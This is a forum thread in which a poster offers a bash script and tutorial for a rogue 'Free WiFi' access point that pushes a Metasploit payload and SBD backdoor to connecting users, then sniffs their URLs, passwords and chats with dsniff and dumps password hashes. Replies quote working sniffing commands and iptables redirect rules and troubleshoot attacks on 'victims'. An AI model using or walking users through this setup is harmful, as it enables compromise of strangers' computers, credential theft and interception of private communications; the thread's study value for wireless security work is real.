Thread: [Tutorial] How to: Create Fake AP (with an auto bash script!)

  1. #1

    [Script] FakeAP_pwn-v0.1 - Create a Fake AP (auto bash script)

    Links
    Commands: http://pastebin.com/f3971a16b
    Download 7z: http://www.mediafire.com/download.php?ykobuygmiyn


    What is this?
    I've had a go at making a bash script to automate creating a 'Fake AP' (Access Point) and 'pwn' whoever connects to it!
    This is a bash script and a few other things to make a fake access point which is transparent (allowing the target to surf the Inter-webs afterwards, once they have been exploited!).


    How does this work?
    > Creates a fake AP and DHCP server.
    > Runs a web server & creates an exploit with metasploit.
    > Waits for the target to connect, download and run the exploit, after which it allows them to surf the Inter-webs.
    > Uses a backdoor, SBD (Secure BackDoor - a bit like netcat!), though this could be replaced with VNC if the attacker wishes!
    > Then starts a few 'sniffing' programs (dsniff suite) to watch what the target does!


    What do I need?
    > Two interfaces, one for Internet (wired/wireless) and the other for becoming an access point (wireless only!)
    > An Internet connection (though you could mod it so it's non-transparent)
    > airmon-ng, dhcpd3, apache, metasploit, snarf suite <--- All on BackTrack!


    What's in the 7z file?

    > FakeAP_pwn.sh <--- Bash script to run
    > FakeAP_pwn.rc <--- Metasploit resource
    > sbdbg.exe <--- Backdoor
    > dhcpd.conf <--- My DHCP config (in case you need it)
    > index.html <--- The page the target is forced to see before they have access to the Internet.


    How to use:

    1.) Extract the 7z file to /root/FakeAP_pwn.
    2.) Edit FakeAP_pwn.sh with your gateway, Internet interface, wireless AP interface.
    3.) sh /root/FakeAP_pwn/FakeAP_pwn.sh
    4.) Wait for a connection...
    5.) Game Over.


    Notes:
    It works for me (=
    I'm running BackTrack 4 Pre Final, The target is running Windows XP Pro SP3 (fully up-to-date 2009-03-25), with no firewall and no AV. Not tested with anything else!
    The connection is reversed - so the connection comes from the target to the attacker; therefore, as the attacker is the server, it could help out with firewalls...
    There is stuff commented out; the stuff at the end is what I want to happen, the other stuff is other methods of doing the same thing!
    FakeAP_pwn.7z (17.7KB, MD5 006ee8522deb5c4d71c754e94282a516)

    Blog Post:http://g0tmi1k.blogspot.com/2009/06/...e-ap-with.html
    Forum Post: http://forums.remote-exploit.org/wir...sh-script.html



    ~g0tmi1k
    ~ Have you, g0tmi1k? ~
    :rolleyes: <(^^,)> :p d[-_^]b (= =D-->--< :eek:

  2. #2
    fnord0 (Senior Member, joined Jul 2008, 144 posts)

    bravo! I am grabbing it right now, will give it a shot (something new to play with) ... as I have yet to mess with fakeAPs...it just so happens I was tonight looking thru these forums and ran into some great posts dealing with just this subject (and karmetasploit), but most of the posts have a lot to do with BT3 -- yet I'm sure a lot easily applies to backtrack4 (pre final). thanks for the effort, this will put me on the right track for sure, I will report back with my experience!
    'see the fnords!'

  3. #3
    Virchanza (Very good friend of the forum, joined Jan 2010, 863 posts)

    Gonna give this a go myself too... I'll let cha know
    Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".

  4. #4
    fnord0 (Senior Member, joined Jul 2008, 144 posts)

    I gave 'er a go, and I gotta say it worked (( with some changes )) I am quite impressed tho, very cool congrats! this helped me a lot with my first go at fake APs. I am running an alfa awus050nh 802.11a/b/g/n USB device, off the rt2800usb (rt2x00-based) module-set. so I dunno if that came into play why I had issues or not?
    (( again this was my first fakeAP use, so I am gonna tell ya what I had to do to get it to work with yr script, but please don't laugh if I spout off something that should be considered a given when working with this type of environment... I am just new to it is all ))

    - I added the following variables (well, changed fakeap_interface) to yr script after some troubleshooting with airbase-ng not starting correctly on my BT4pf box ::
    export fakeap_interface=mon0 <<-- I tried wlan0, but airbase-ng complained (my konsole buffer got overwritten, so I can't give specifics), it essentially wanted monitor mode
    export fakeaphome=/root/wifi/FakeAP_pwn <<-- I wanted to run yr tool in my own dir (( I then called yr scripts using $fakeaphome ))
    export airbasehome=/usr/sbin/airbase-ng <<-- most calls for xterm worked "right out of yr archive", but the call for the airbase xterm session would die every time! I tested, and found I had to call airbase-ng with the full path ($airbasehome), and BAM it worked (not sure why??)
    export dhcpdhome=/usr/sbin/dhcpd3 <<-- another xterm oddity, this time with dhcpd3 ( root's $PATH variable includes /usr/sbin, so I'm not sure why I have to call the full path, but it's required on my box, in this script )

    ---------------------------------------------E D I T---------------------------------------------

    ok, change up... instead of all the "export $toolnamehome" bs, I kept the "export fakeaphome=/root/wifi/FakeAP_pwn" so I could still use yr script in its own dir...
    then created a new "export toolsdir=/usr/sbin" ala airoscript
    then just put "$toolsdir/" in front of each call to the tools airbase-ng, dhcpd3, urlsnarf, dsniff, and msgsnarf. (as they all resided in /usr/sbin, easy enuff)
    after those changes, I started yr script and just about everything else but dhcpd worked... I fired up my upstairs computer, configured my atheros/mad-wifi-based card to connect to the new "Free WiFi" AP, and .... no IP address, unable to pull DHCP! manually configuring 10.0.0.2/24 worked, and I was able to ping 10.0.0.1!

    now, I cannot for the life of me figure this part out?! dhcpd3 with BT4 pre final... I kept getting this error, and dhcpd3 would die ::

    Code:
    Can't open /root/wifi/FakeAP_pwn/dhcpd.conf: Permission denied
    now, I would get that calling dhcpd3 from the command line, or thru yr script, everywhere! if I run the command line (as taken from yr script) "/usr/sbin/dhcpd3 -d -f -cf /root/wifi/FakeAP_pwn/dhcpd.conf at0" I can duplicate the above error every time (yes, I own the dir & file, 777 permissions, user:group = root:root -- I'm root for Christ's sake, but I did check and re-chown/re-chmod...), BUT if I move the dhcpd.conf file to /etc/dhcp3, I still get this damned error, yet the dhcpd server would work flawlessly ::

    Code:
    Can't open /root/wifi/FakeAP_pwn/dhcpd.conf: Permission denied
    I ended up with the following line for my change to yr script for calling "dhcpd3" ::
    Code:
    xterm -geometry 75x25+1+100 -T DHCP -e $dhcpdhome -d -f at0&
    also, I notice @ near the bottom of yr script you explicitly call the following on wlan0 ::
    Code:
    xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i wlan0&
    xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i wlan0&
    xterm -geometry 100x10+470+300 -T "IM Chat" -e msgsnarf -i wlan0&
    I'd suspect one would want to change wlan0 to $fakeap_interface, as in my case I had to run it off "mon0" interface.

    I too would like to see the things you got listed at the very bottom of yr script, but first I need to figure out what they do! hahaha, I've yet to play too much with metasploit... and since I was running linux on the box I had connecting to the fakeAP, I couldn't test out the metasploit hack you had (SBD... wine? ha).

    all in all, excellent learning tool! and a great tool to pentest yr own W/LAN. good stuff! consider me a fan
    'see the fnords!'

  5. #5


    fnord0,
    WOW! Thanks for testing! & thanks for the thanks
    I was using:
    > inbuilt Acer 5920 WiFi (Intel iwl4965?) - wlan0
    > USB Linksys WUSB54GC - wlan1

    Dude, don't worry - the script was made for me and me only =P
    I'm glad that it works on other people's setups, tho I might now make v2 or something which is more "universal". The settings which are there are the only things which I need to "tweak". I might end up making more settings, which have paths to files etc

    And thanks for pointing out "wlan0", I forgot to change them after I was testing it out! Think it needs to be "at0", tho I'm not too sure...

    I missed out the bit where I compiled sbd in bt4 (tho I will correct this asap), though I could try and do it from wine, using the same file...

    The bit at the bottom is metasploit stuff: get system info, get username, get hashes (and then crack them with john the ripper!)

    It's odd that you have to give the path to the programs, I wouldn't know why that is, as we both are using backtrack 4 pre final

    btw, happy learning



    Virchanza,
    Please do! More input the better (though you can see that its not perfect...yet (; )



    p.s. Thanks for the vote

  6. #6
    Just burned his ISO (joined May 2009, 6 posts)

    Works for me, just changed ssid, interfaces, done. Thanks for sharing. o/

    Edit: Also, this helps me understand how to share internet with people. Years ago, I would have clicked >9000 times through a variety of windows, configured settings on clients, all that tedious stuff. Now, I'd just remove the payload/exploit/fun section, tweak as I like and there we go.

    Many thanks, blessings, and {0,1,2,3...w} internets to you, my good sir.

    Post Septum

    You could disable payload stuff and fire up hamster/ferret - beautiful.

  7. #7
    Just burned his ISO (joined Jun 2009, 8 posts)

    I tried to mod the script, to get a non-transparent AP:

    Code:
    ifconfig at0 up
    ifconfig lo up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
    iptables -P FORWARD ACCEPT
    iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1

    but it still does not work, any ideas?

  8. #8


    Here are the notes which I've made for making a fakeAP (non-transparent mode)
    http://pastebin.com/f1333c8f3

    Does that help?

  9. #9
    Just burned his ISO (joined Jun 2009, 8 posts)

    Does not work for me.
    Do you use the same dhcpd.conf as in transparent mode?
    If I try to connect to any webpage, the browser does nothing..

  10. #10
    Junior Member (joined Dec 2007, 76 posts)

    Hi, I've tried this script. I've also edited it with the comments received above, which make it work better. The only problem is when I connect to this from my victim machine, it doesn't assign it an IP for some reason. I can't work it out.

    I am using the eth0 adapter as the internet connection and the wlan0 for the fake ap.

    I have put the script I've edited up on pastebin :
    pastebin - collaborative debugging tool

    I'm pretty sure there aren't any errors in this, but I just can't seem to get the dhcp to assign the victims an IP, thus the 'limited or no connectivity' error. Have you any idea how I can sort this?


    Cheers,
    ecs
